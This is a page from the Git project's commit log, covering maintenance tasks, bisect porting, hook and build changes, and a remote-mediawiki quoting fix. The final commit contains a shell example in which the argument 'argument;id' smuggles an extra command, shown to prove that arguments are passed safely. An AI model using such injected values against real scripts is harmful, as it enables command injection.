Commit Graph

61131 Commits

Author SHA1 Message Date
Derrick Stolee
18e449f86b midx: enable core.multiPackIndex by default
The core.multiPackIndex setting has been around since c4d25228eb
(config: create core.multiPackIndex setting, 2018-07-12), but has been
disabled by default. If a user wishes to use the multi-pack-index
feature, then they must enable this config and run 'git multi-pack-index
write'.

The multi-pack-index feature is relatively stable now, so make the
config option true by default. For users that do not use a
multi-pack-index, the only extra cost will be a file lookup to see if a
multi-pack-index file exists (once per process, per object directory).

Also, this config option will be referenced by an upcoming
"incremental-repack" task in the maintenance builtin, so move the config
option into the repository settings struct. Note that if
GIT_TEST_MULTI_PACK_INDEX=1, then we want to ignore the config option
and treat core.multiPackIndex as enabled.

Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-25 10:53:04 -07:00
Derrick Stolee
3e220e6069 maintenance: create auto condition for loose-objects
The loose-objects task deletes loose objects that already exist in a
pack-file, then place the remaining loose objects into a new pack-file.
If this step runs all the time, then we risk creating pack-files with
very few objects with every 'git commit' process. To prevent
overwhelming the packs directory with small pack-files, place a minimum
number of objects to justify the task.

The 'maintenance.loose-objects.auto' config option specifies a minimum
number of loose objects to justify the task to run under the '--auto'
option. This defaults to 100 loose objects. Setting the value to zero
will prevent the step from running under '--auto' while a negative value
will force it to run every time.

Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-25 10:53:04 -07:00
Derrick Stolee
252cfb7cb8 maintenance: add loose-objects task
One goal of background maintenance jobs is to allow a user to
disable auto-gc (gc.auto=0) but keep their repository in a clean
state. Without any cleanup, loose objects will clutter the object
database and slow operations. In addition, the loose objects will
take up extra space because they are not stored with deltas against
similar objects.

Create a 'loose-objects' task for the 'git maintenance run' command.
This helps clean up loose objects without disrupting concurrent Git
commands using the following sequence of events:

1. Run 'git prune-packed' to delete any loose objects that exist
   in a pack-file. Concurrent commands will prefer the packed
   version of the object to the loose version. (Of course, there
   are exceptions for commands that specifically care about the
   location of an object. These are rare for a user to run on
   purpose, and we hope a user that has selected background
   maintenance will not be trying to do foreground maintenance.)

2. Run 'git pack-objects' on a batch of loose objects. These
   objects are grouped by scanning the loose object directories in
   lexicographic order until listing all loose objects -or-
   reaching 50,000 objects. This is more than enough if the loose
   objects are created only by a user doing normal development.
   We noticed users with _millions_ of loose objects because VFS
   for Git downloads blobs on-demand when a file read operation
   requires populating a virtual file.

This step is based on a similar step in Scalar [1] and VFS for Git.
[1] https://github.com/microsoft/scalar/blob/master/Scalar.Common/Maintenance/LooseObjectsStep.cs

Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-25 10:53:04 -07:00
Derrick Stolee
28cb5e66dd maintenance: add prefetch task
When working with very large repositories, an incremental 'git fetch'
command can download a large amount of data. If there are many other
users pushing to a common repo, then this data can rival the initial
pack-file size of a 'git clone' of a medium-size repo.

Users may want to keep the data on their local repos as close as
possible to the data on the remote repos by fetching periodically in
the background. This can break up a large daily fetch into several
smaller hourly fetches.

The task is called "prefetch" because it is work done in advance
of a foreground fetch to make that 'git fetch' command much faster.

However, if we simply ran 'git fetch <remote>' in the background,
then the user running a foreground 'git fetch <remote>' would lose
some important feedback when a new branch appears or an existing
branch updates. This is especially true if a remote branch is
force-updated and this isn't noticed by the user because it occurred
in the background. Further, the functionality of 'git push
--force-with-lease' becomes suspect.

When running 'git fetch <remote> <options>' in the background, use
the following options for careful updating:

1. --no-tags prevents getting a new tag when a user wants to see
   the new tags appear in their foreground fetches.

2. --refmap= removes the configured refspec which usually updates
   refs/remotes/<remote>/* with the refs advertised by the remote.
   While this looks confusing, this was documented and tested by
   b40a50264a (fetch: document and test --refmap="", 2020-01-21),
   including this sentence in the documentation:

	Providing an empty `<refspec>` to the `--refmap` option
	causes Git to ignore the configured refspecs and rely
	entirely on the refspecs supplied as command-line arguments.

3. By adding a new refspec "+refs/heads/*:refs/prefetch/<remote>/*"
   we can ensure that we actually load the new values somewhere in
   our refspace while not updating refs/heads or refs/remotes. By
   storing these refs here, the commit-graph job will update the
   commit-graph with the commits from these hidden refs.

4. --prune will delete the refs/prefetch/<remote> refs that no
   longer appear on the remote.

5. --no-write-fetch-head prevents updating FETCH_HEAD.

We've been using this step as a critical background job in Scalar
[1] (and VFS for Git). This solved a pain point that was showing up
in user reports: fetching was a pain! Users do not like waiting to
download the data that was created while they were away from their
machines. After implementing background fetch, the foreground fetch
commands sped up significantly because they mostly just update refs
and download a small amount of new data. The effect is especially
dramatic when paried with --no-show-forced-udpates (through
fetch.showForcedUpdates=false).

[1] https://github.com/microsoft/scalar/blob/master/Scalar.Common/Maintenance/FetchStep.cs

Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-25 10:53:04 -07:00
Johannes Schindelin
3eccc7b99d cmake: ignore files generated by CMake as run in Visual Studio
As of recent Visual Studio versions, CMake support is built-in:
https://docs.microsoft.com/en-us/cpp/build/cmake-projects-in-visual-studio?view=vs-2019

All that needs to be done is to open the worktree as a folder, and
Visual Studio will find the `CMakeLists.txt` file and automatically
generate the project files.

Let's ignore the entirety of those generated files.

Helped-by: Đoàn Trần Công Danh <congdanhqx@gmail.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-25 10:50:44 -07:00
Jeff King
45d93eb824 shortlog: change "author" variables to "ident"
We already match "committer", and we're about to start
matching more things. Let's use a more neutral variable to
avoid confusion.

Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-25 10:47:50 -07:00
Christian Couder
73c6de06af bisect: don't use invalid oid as rev when starting
In 06f5608c14 (bisect--helper: `bisect_start` shell function
partially in C, 2019-01-02), we changed the following shell
code:

-      rev=$(git rev-parse -q --verify "$arg^{commit}") || {
-              test $has_double_dash -eq 1 &&
-              die "$(eval_gettext "'\$arg' does not appear to be a valid revision")"
-              break
-      }
-      revs="$revs $rev"

into:

+      char *commit_id = xstrfmt("%s^{commit}", arg);
+      if (get_oid(commit_id, &oid) && has_double_dash)
+              die(_("'%s' does not appear to be a valid "
+                    "revision"), arg);
+
+      string_list_append(&revs, oid_to_hex(&oid));
+      free(commit_id);

In case of an invalid "arg" when "has_double_dash" is false, the old
code would "break" out of the argument loop.

In the new C code though, `oid_to_hex(&oid)` is unconditonally
appended to "revs". This is wrong first because "oid" is junk as
`get_oid(commit_id, &oid)` failed and second because it doesn't break
out of the argument loop.

Not breaking out of the argument loop means that "arg" is then not
treated as a path restriction (which is wrong).

Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-25 09:57:48 -07:00
Alex Henrie
54200cef86 pull: don't warn if pull.ff has been set
A user who understands enough to set pull.ff does not need additional
instructions.

Signed-off-by: Alex Henrie <alexhenrie24@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-24 23:04:27 -07:00
Junio C Hamano
610e2b9240 blame: validate and peel the object names on the ignore list
The command reads list of object names to place on the ignore list
either from the command line or from a file, but they are not
checked with their object type (those read from the file are not
even checked for object existence).

Extend the oidset_parse_file() API and allow it to take a callback
that can be used to die (e.g. when an inappropriate input is read)
or modify the object name read (e.g. when a tag pointing at a commit
is read, and the caller wants a commit object name), and use it in
the code that handles ignore list.

Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-24 22:20:58 -07:00
Junio C Hamano
f58931c8d6 t8013: minimum preparatory clean-up
The closing sq for each test piece should be placed at the beginning
of line.

Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-24 22:20:57 -07:00
Thomas Guyot-Sionnest
ff0c7fa8cb diff: fix modified lines stats with --stat and --numstat
Only skip diffstats when both oids are valid and identical. This check
was causing both false-positives (files included in diffstats with no
actual changes (0 lines modified) and false-negatives (showing 0 lines
modified in stats when files had actually changed).

Also replaced same_contents with may_differ to avoid confusion.

Signed-off-by: Thomas Guyot-Sionnest <tguyot@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-24 12:31:45 -07:00
Jeff King
176380fd11 Revert "fast-export: use local array to store anonymized oid"
This reverts commit f39ad38410.

That commit was trying to silence a type-punning warning on older
versions of gcc. However, its analysis was all wrong. I didn't notice
that we _were_ in fact type-punning because there are two versions of
put_be32(): one that uses casts and unaligned loads, and another that
uses bitshifts. I looked at the latter, but on my platform we were
defaulting to the former.

However, as of the previous commit, we'll always use the bitshift
version. So we can drop this hackery to avoid the warning, making the
code slightly cleaner.

Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-24 12:30:11 -07:00
Jeff King
c578e29ba0 bswap.h: drop unaligned loads
Our put_be32() routine and its variants (get_be32(), put_be64(), etc)
has two implementations: on some platforms we cast memory in place and
use nothl()/htonl(), which can cause unaligned memory access. And on
others, we pick out the individual bytes using bitshifts.

This introduces extra complexity, and sometimes causes compilers to
generate warnings about type-punning. And it's not clear there's any
performance advantage.

This split goes back to 660231aa97 (block-sha1: support for
architectures with memory alignment restrictions, 2009-08-12). The
unaligned versions were part of the original block-sha1 code in
d7c208a92e (Add new optimized C 'block-sha1' routines, 2009-08-05),
which says it is:

   Based on the mozilla SHA1 routine, but doing the input data accesses a
   word at a time and with 'htonl()' instead of loading bytes and shifting.

Back then, Linus provided timings versus the mozilla code which showed a
27% improvement:

  https://lore.kernel.org/git/alpine.LFD.2.01.0908051545000.3390@localhost.localdomain/

However, the unaligned loads were either not the useful part of that
speedup, or perhaps compilers and processors have changed since then.
Here are times for computing the sha1 of 4GB of random data, with and
without -DNO_UNALIGNED_LOADS (and BLK_SHA1=1, of course). This is with
gcc 10, -O2, and the processor is a Core i9-9880H.

  [stock]
  Benchmark #1: t/helper/test-tool sha1 <foo.rand
    Time (mean ± σ):      6.638 s ±  0.081 s    [User: 6.269 s, System: 0.368 s]
    Range (min … max):    6.550 s …  6.841 s    10 runs

  [-DNO_UNALIGNED_LOADS]
  Benchmark #1: t/helper/test-tool sha1 <foo.rand
    Time (mean ± σ):      6.418 s ±  0.015 s    [User: 6.058 s, System: 0.360 s]
    Range (min … max):    6.394 s …  6.447 s    10 runs

And here's the same test run on an AMD A8-7600, using gcc 8.

  [stock]
  Benchmark #1: t/helper/test-tool sha1 <foo.rand
    Time (mean ± σ):     11.721 s ±  0.113 s    [User: 10.761 s, System: 0.951 s]
    Range (min … max):   11.509 s … 11.861 s    10 runs

  [-DNO_UNALIGNED_LOADS]
  Benchmark #1: t/helper/test-tool sha1 <foo.rand
    Time (mean ± σ):     11.744 s ±  0.066 s    [User: 10.807 s, System: 0.928 s]
    Range (min … max):   11.637 s … 11.863 s    10 runs

So the unaligned loads don't seem to help much, and actually make things
worse. It's possible there are platforms where they provide more
benefit, but:

  - the non-x86 platforms for which we use this code are old and obscure
    (powerpc and s390).

  - the main caller that cares about performance is block-sha1. But
    these days it is rarely used anyway, in favor of sha1dc (which is
    already much slower, and nobody seems to have cared that much).

Let's just drop unaligned versions entirely in the name of simplicity.

Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-24 12:30:09 -07:00
Pranit Bauva
517ecb3161 bisect--helper: reimplement bisect_next and bisect_auto_next shell functions in C
Reimplement the `bisect_next()` and the `bisect_auto_next()` shell functions
in C and add the subcommands to `git bisect--helper` to call them from
git-bisect.sh .

bisect_auto_next() function returns an enum bisect_error type as whole
`git bisect` can exit with an error code when bisect_next() does.

Return an error when `bisect_next()` fails, that fix a bug on shell script
version.

Using `--bisect-next` and `--bisect-auto-next` subcommands is a
temporary measure to port shell function to C so as to use the existing
test suite. As more functions are ported, `--bisect-auto-next`
subcommand will be retired and will be called by some other methods.

Mentored-by: Lars Schneider <larsxschneider@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-24 12:06:30 -07:00
Miriam Rubio
c7a7f48f4f bisect: call 'clear_commit_marks_all()' in 'bisect_next_all()'
As there can be other revision walks after bisect_next_all(),
let's add a call to a function to clear all the marks at the
end of bisect_next_all().

Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-24 12:06:30 -07:00
Pranit Bauva
09535f056b bisect--helper: reimplement bisect_autostart shell function in C
Reimplement the `bisect_autostart()` shell function in C and add the
C implementation from `bisect_next()` which was previously left
uncovered.

Add `--bisect-autostart` subcommand to be called from git-bisect.sh.
Using `--bisect-autostart` subcommand is a temporary measure to port
the shell function to C so as to use the existing test suite. As more
functions are ported, this subcommand will be retired and
bisect_autostart() will be called directly by `bisect_state()`.

Change behavior of shell script that returned success when user aborted
the bisection.

Mentored-by: Lars Schneider <larsxschneider@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-24 12:06:30 -07:00
Denton Liu
d8d3d632f4 hooks--update.sample: use hash-agnostic zero OID
The update sample hook has the zero OID hardcoded as 40 zeros. However,
with the introduction of SHA-256 support, this assumption no longer
holds true. Replace the hardcoded $z40 with a call to

	git hash-object --stdin </dev/null | tr '[0-9a-f]' '0'

so the sample hook becomes hash-agnostic.

Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-23 09:31:45 -07:00
Denton Liu
8c7e505950 hooks--pre-push.sample: use hash-agnostic zero OID
The pre-push sample hook has the zero OID hardcoded as 40 zeros.
However, with the introduction of SHA-256 support, this assumption no
longer holds true. Replace the hardcoded $z40 with a call to

	git hash-object --stdin </dev/null | tr '[0-9a-f]' '0'

so the sample hook becomes hash-agnostic.

Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-23 09:31:45 -07:00
Denton Liu
6a117da6e5 hooks--pre-push.sample: modernize script
The preferred form for a command substitution is $() over ``. Use this
form for the command substitution in the sample hook.

The preferred form for conditional tests is to use `test` over [].
Replace [] with `test`.

Finally, replace all instances of "sha" with "oid".

Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-23 09:31:45 -07:00
Junio C Hamano
e1cfff6765 Sixteenth batch
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-22 12:36:34 -07:00
Junio C Hamano
6854689e65 Merge branch 'ar/fetch-ipversion-in-all'
"git fetch --all --ipv4/--ipv6" forgot to pass the protocol options
to instances of the "git fetch" that talk to individual remotes,
which has been corrected.

* ar/fetch-ipversion-in-all:
  fetch: pass --ipv4 and --ipv6 options to sub-fetches
2020-09-22 12:36:34 -07:00
Junio C Hamano
31b9454170 Merge branch 'dl/complete-format-patch-recent-features'
Update to command line completion (in contrib/)

* dl/complete-format-patch-recent-features:
  contrib/completion: complete options that take refs for format-patch
2020-09-22 12:36:33 -07:00
Junio C Hamano
39149df364 Merge branch 'cs/don-t-pretend-a-failed-remote-set-head-succeeded'
"git remote set-head" that failed still said something that hints
the operation went through, which was misleading.

* cs/don-t-pretend-a-failed-remote-set-head-succeeded:
  remote: don't show success message when set-head fails
2020-09-22 12:36:32 -07:00
Junio C Hamano
221b755f3a Merge branch 'jk/dont-count-existing-objects-twice'
There is a logic to estimate how many objects are in the
repository, which is mean to run once per process invocation, but
it ran every time the estimated value was requested.

* jk/dont-count-existing-objects-twice:
  packfile: actually set approximate_object_count_valid
2020-09-22 12:36:32 -07:00
Junio C Hamano
26a3728bed Merge branch 'al/ref-filter-merged-and-no-merged'
"git for-each-ref" and friends that list refs used to allow only
one --merged or --no-merged to filter them; they learned to take
combination of both kind of filtering.

* al/ref-filter-merged-and-no-merged:
  Doc: prefer more specific file name
  ref-filter: make internal reachable-filter API more precise
  ref-filter: allow merged and no-merged filters
  Doc: cover multiple contains/no-contains filters
  t3201: test multiple branch filter combinations
2020-09-22 12:36:31 -07:00
Junio C Hamano
4d515253af Merge branch 'cd/commit-graph-doc'
Doc update.

* cd/commit-graph-doc:
  commit-graph-format.txt: fix no-parent value
2020-09-22 12:36:30 -07:00
Junio C Hamano
9a0249959d Merge branch 'kk/build-portability-fix'
Portability tweak for some shell scripts used while building.

* kk/build-portability-fix:
  Fit to Plan 9's ANSI/POSIX compatibility layer
2020-09-22 12:36:30 -07:00
Junio C Hamano
4aff18a3f0 Merge branch 'ls/mergetool-meld-auto-merge'
The 'meld' backend of the "git mergetool" learned to give the
underlying 'meld' the '--auto-merge' option, which would help
reduce the amount of text that requires manual merging.

* ls/mergetool-meld-auto-merge:
  mergetool: allow auto-merge for meld to follow the vim-diff behavior
2020-09-22 12:36:29 -07:00
Junio C Hamano
458205ff0f Merge branch 'pw/add-p-edit-ita-path'
"add -p" now allows editing paths that were only added in intent.

* pw/add-p-edit-ita-path:
  add -p: fix editing of intent-to-add paths
2020-09-22 12:36:28 -07:00
Junio C Hamano
c9a04f036f Merge branch 'hn/refs-trace-backend'
Developer support.

* hn/refs-trace-backend:
  refs: add GIT_TRACE_REFS debugging mechanism
2020-09-22 12:36:28 -07:00
Junio C Hamano
b7e65b51e5 Merge branch 'jt/threaded-index-pack'
"git index-pack" learned to resolve deltified objects with greater
parallelism.

* jt/threaded-index-pack:
  index-pack: make quantum of work smaller
  index-pack: make resolve_delta() assume base data
  index-pack: calculate {ref,ofs}_{first,last} early
  index-pack: remove redundant child field
  index-pack: unify threaded and unthreaded code
  index-pack: remove redundant parameter
  Documentation: deltaBaseCacheLimit is per-thread
2020-09-22 12:36:28 -07:00
Junio C Hamano
634e0084fa Merge branch 'es/format-patch-interdiff-cleanup'
"format-patch --range-diff=<prev> <origin>..HEAD" has been taught
not to ignore <origin> when <prev> is a single version.

* es/format-patch-interdiff-cleanup:
  format-patch: use 'origin' as start of current-series-range when known
  diff-lib: tighten show_interdiff()'s interface
  diff: move show_interdiff() from its own file to diff-lib
2020-09-22 12:36:28 -07:00
Junio C Hamano
bcb68bff80 Merge branch 'os/fetch-submodule-optim'
Optimization around submodule handling.

* os/fetch-submodule-optim:
  fetch: do not look for submodule changes in unchanged refs
2020-09-22 12:36:28 -07:00
brian m. carlson
47ac970309 builtin/clone: avoid failure with GIT_DEFAULT_HASH
If a user is cloning a SHA-1 repository with GIT_DEFAULT_HASH set to
"sha256", then we can end up with a repository where the repository
format version is 0 but the extensions.objectformat key is set to
"sha256".  This is both wrong (the user has a SHA-1 repository) and
nonfunctional (because the extension cannot be used in a v0 repository).

This happens because in a clone, we initially set up the repository, and
then change its algorithm based on what the remote side tells us it's
using.  We've initially set up the repository as SHA-256 in this case,
and then later on reset the repository version without clearing the
extension.

We could just always set the extension in this case, but that would mean
that our SHA-1 repositories weren't compatible with older Git versions,
even though there's no reason why they shouldn't be.  And we also don't
want to initialize the repository as SHA-1 initially, since that means
if we're cloning an empty repository, we'll have failed to honor the
GIT_DEFAULT_HASH variable and will end up with a SHA-1 repository, not a
SHA-256 repository.

Neither of those are appealing, so let's tell the repository
initialization code if we're doing a reinit like this, and if so, to
clear the extension if we're using SHA-1.  This makes sure we produce a
valid and functional repository and doesn't break any of our other use
cases.

Reported-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-22 09:22:32 -07:00
Pratyush Yadav
95bfc6cdb6 Merge branch 'st/spaces-tabs-cleanup' into master
Clean up some whitespace.

* st/spaces-tabs-cleanup:
  git-gui: fix mixed tabs and spaces; prefer tabs
2020-09-22 15:21:19 +05:30
Serg Tereshchenko
5c1b391307 git-gui: fix mixed tabs and spaces; prefer tabs
Spaces are replaced with tabs when possible. In some cases just
replacing spaces with tabs would break readability, so it was left as it
is.

Signed-off-by: Serg Tereshchenko <serg.partizan@gmail.com>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
2020-09-22 15:07:39 +05:30
Jeff King
579789dbce diff-highlight: correctly match blank lines for flush
We try to flush the output from diff-highlight whenever we see a blank
line. That lets you see the output for each commit as soon as it is
generated, even if Git is still chugging away at a diff, or traversing
to find the next commit.

However, our "blank line" match checks length($_). That won't ever be
true, because we haven't chomped the line ending. As a result, we never
flush. Instead, let's use a simple regex which handles line endings in
with the end-of-line marker.

This has been broken since the initial version in 927a13fe87 (contrib:
add diff highlight script, 2011-10-18). Probably nobody noticed because:

  - most output is big enough, or comes fast enough, that it flushes
    anyway. And it can be difficult to notice the difference between
    "show a commit, then pause" and "pause, then show two commits". I
    only noticed because I was viewing "git log" output on a repo with a
    very slow textconv filter.

  - if stdout is going to the terminal (and not another pager like
    less), then the flush isn't necessary. So any manual testing would
    show it appearing to work.

You can easily see the difference with something like:

  echo '* diff=slow' >>.gitattributes
  git -c diff.slow.textconv='sleep 1; cat' \
      -c pager.log='diff-highlight | less' \
      log -p

That should generate one commit every second or so (more if it touches
multiple files), but without this patch it waits for many seconds before
generating several pages of output.

Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-21 22:33:28 -07:00
Jonathan Tan
625e7f148e promisor-remote: remove unused variable
The variable core_partial_clone_filter_default has been unused since
fa3d1b63e8 ("promisor-remote: parse remote.*.partialclonefilter",
2019-06-25), when Git was changed to refer to
remote.*.partialclonefilter as the default filter when fetching in a
partial clone, but (perhaps inadvertently) there was no fallback to
core.partialclonefilter.

One alternative is to add the fallback, but the aforementioned change
was made more than a year ago and I have not heard of any complaints
regarding this matter. In addition, there is currently no mention of
core.partialclonefilter in the user documentation. So it seems best to
reaffirm that Git will only support remote.*.partialclonefilter.

Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-21 22:32:49 -07:00
Johannes Schindelin
ef60e9f74b ci: stop linking built-ins to the dashed versions
Since e4597aae65 (run test suite without dashed git-commands in PATH,
2009-12-02), we stopped running our tests with `git-foo` binaries found
at the top-level directory of a freshly built source tree; instead we
have placed only `git` and selected `git-foo` commands that must be on
`$PATH` in `bin-wrappers/` and prepended that `bin-wrappers/` to the
`PATH` used in the test suite. We did that to catch the tests and
scripted Git commands that still try to use the dashed form.

Since CI jobs will not install the built Git to anywhere, and the
hardlinks we make at the top-level of the source tree for `git-add` and
friends are not even used during tests, they are pure waste of resources
these days.

Thanks to the newly invented `SKIP_DASHED_BUILT_INS` knob, we can now
skip creating these links in the source tree. So let's do that.

Note that this change introduces a subtle change of behavior: when Git's
`cmd_main()` calls `setup_path()`, it inserts the value of
`GIT_EXEC_PATH` (defaulting to `<prefix>/libexec/git-core`) at the
beginning of the environment variable `PATH`. This is necessary to find
e.g. scripted commands that are installed in that location. For the
purposes of Git's test suite, the `bin-wrappers/` scripts override
`GIT_EXEC_PATH` to point to the top-level directory of the source code.

In other words, if a scripted command had used a dashed invocation of a
built-in Git command, it would not have been caught previously, which is
fixed by this change.

Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-21 15:47:54 -07:00
Johannes Schindelin
179227d6e2 Optionally skip linking/copying the built-ins
For a long time already, the non-dashed form of the built-ins is the
recommended way to write scripts, i.e. it is better to call `git merge
[...]` than to call `git-merge [...]`.

While Git still supports the dashed form (by hard-linking the `git`
executable to the dashed name in `libexec/git-core/`), in practice, it
is probably almost irrelevant.

However, we *do* care about keeping people's scripts working (even if
they were written before the non-dashed form started to be recommended).

Keeping this backwards-compatibility is not necessarily cheap, though:
even so much as amending the tip commit in a git.git checkout will
require re-linking all of those dashed commands. On this developer's
laptop, this makes a noticeable difference:

	$ touch version.c && time make
	    CC version.o
	    AR libgit.a
	    LINK git-bugreport.exe
	    [... 11 similar lines ...]
	    LN/CP git-remote-https.exe
	    LN/CP git-remote-ftp.exe
	    LN/CP git-remote-ftps.exe
	    LINK git.exe
	    BUILTIN git-add.exe
	    [... 123 similar lines ...]
	    BUILTIN all
	    SUBDIR git-gui
	    SUBDIR gitk-git
	    SUBDIR templates
	    LINK t/helper/test-fake-ssh.exe
	    LINK t/helper/test-line-buffer.exe
	    LINK t/helper/test-svn-fe.exe
	    LINK t/helper/test-tool.exe

	real    0m36.633s
	user    0m3.794s
	sys     0m14.141s

	$ touch version.c && time make SKIP_DASHED_BUILT_INS=1
	    CC version.o
	    AR libgit.a
	    LINK git-bugreport.exe
	    [... 11 similar lines ...]
	    LN/CP git-remote-https.exe
	    LN/CP git-remote-ftp.exe
	    LN/CP git-remote-ftps.exe
	    LINK git.exe
	    BUILTIN git-receive-pack.exe
	    BUILTIN git-upload-archive.exe
	    BUILTIN git-upload-pack.exe
	    BUILTIN all
	    SUBDIR git-gui
	    SUBDIR gitk-git
	    SUBDIR templates
	    LINK t/helper/test-fake-ssh.exe
	    LINK t/helper/test-line-buffer.exe
	    LINK t/helper/test-svn-fe.exe
	    LINK t/helper/test-tool.exe

	real    0m23.717s
	user    0m1.562s
	sys     0m5.210s

Also, `.zip` files do not have any standardized support for hard-links,
therefore "zipping up" the executables will result in inflated disk
usage. (To keep down the size of the "MinGit" variant of Git for
Windows, which is distributed as a `.zip` file, the hard-links are
excluded specifically.)

In addition to that, some programs that are regularly used to assess
disk usage fail to realize that those are hard-links, and heavily
overcount disk usage. Most notably, this was the case with Windows
Explorer up until the last couple of Windows 10 versions. See e.g.
https://github.com/msysgit/msysgit/issues/58.

To save on the time needed to hard-link these dashed commands, with the
plan to eventually stop shipping with those hard-links on Windows, let's
introduce a Makefile knob to skip generating them.

Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-21 15:47:54 -07:00
Johannes Schindelin
a8b5355d80 msvc: copy the correct .pdb files in the Makefile target install
There is a hard-coded list of `.pdb` files to copy. But we are about to
introduce the `SKIP_DASHED_BUILT_INS` knob in the `Makefile`, which
might make this hard-coded list incorrect.

Let's switch to a dynamically-generated list instead.

Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-21 15:47:53 -07:00
Johannes Schindelin
432f5e638d t3200: avoid variations of the master branch name
To avoid branch names with a loaded history, we already started to avoid
using the name "master" in a couple instances.

The `t3200-branch.sh` script uses variations of this name for branches
other than the default one. So let's change those names, as
"lowest-hanging fruits" in the effort to use more inclusive naming
throughout Git's source code. While at it, make those branch names
independent from the default branch name.

In this particular instance, this rename requires a couple of
non-trivial adjustments, as the aligned output depends on the maximum
length of the displayed branches (which we now changed), and also on the
alphabetical order (which we now changed, too).

Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-21 15:19:28 -07:00
Johannes Schindelin
5a0c32bd4b fast-export: avoid using unnecessary language in a code comment
In an ongoing effort to avoid non-inclusive language, let's avoid using
the branch name "master" in a code comment.

Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-21 15:19:27 -07:00
Johannes Schindelin
659288cd91 t/test-terminal: avoid non-inclusive language
In the ongoing effort to make the Git project a more inclusive place,
let's try to avoid names like "master" where possible.

In this instance, the use of the term `slave` is unfortunately enshrined
in IO::Pty's API. We simply cannot avoid using that word here. But at
least we can get rid of the usage of the word `master` and hope that
IO::Pty will be eventually adjusted, too.

Guessing that IO::Pty might follow Python's lead, we replace the name
`master` by `parent` (hoping that IO::Pty will adopt the parent/child
nomenclature, too).

Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-21 15:19:27 -07:00
Denton Liu
cce7d6ecfc contrib/completion: complete git diff --merge-base
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-21 14:09:46 -07:00
Denton Liu
3d09c22869 builtin/diff-tree: learn --merge-base
The previous commit introduced ---merge-base a way to take the diff
between the working tree or index and the merge base between an arbitrary
commit and HEAD. It makes sense to extend this option to support the
case where two commits are given too and behave in a manner identical to
`git diff A...B`.

Introduce the --merge-base flag as an alternative to triple-dot
notation. Thus, we would be able to write the above as
`git diff --merge-base A B`.

Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
2020-09-21 13:37:03 -07:00
Ævar Arnfjörð Bjarmason
9a8606465e remote-mediawiki: use "sh" to eliminate unquoted commands
Remove the use of run_git_unquoted() completely with a use of "sh -c"
suggested by Jeff King, i.e.:

    sh -c '"$@" 2>/dev/null' -- echo sneaky 'argument;id'

I don't think this is needed now for any potential RCE issue. The
$remotename argument is ultimately picked by the local user (and
similarly, the $local variable comes from a user-supplied
refspec).

